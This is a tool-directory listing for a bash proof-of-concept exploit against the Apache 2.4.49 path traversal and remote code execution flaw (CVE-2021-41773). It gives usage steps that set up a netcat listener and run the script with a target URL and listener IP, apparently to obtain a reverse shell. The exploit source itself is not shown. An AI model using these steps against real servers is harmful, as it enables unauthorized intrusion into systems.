Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-41773 — Bash POC script for RCE vulnerability in Apache 2.4.49 | Kitploit
Tools/GitHubGitHub/mah4nzfr/cve-2021-41773
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmah4nzfr/cve-2021-41773

CVE-2021-41773

Bash POC script for RCE vulnerability in Apache 2.4.49

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-41773

A simple bash POC script for Path Traversal & RCE vulnerability in Apache 2.4.49

Example usage:

Setup a netcat listener:

root@kitploit:~
$ nc -nvlp <Port>

Then run the script:

root@kitploit:~
$ ./exploit.sh <Target URL> <Listener IP> <Port>

Disclamer

This tool is for educational purposes only. I hold no responsibility for any misuse.

Download Tool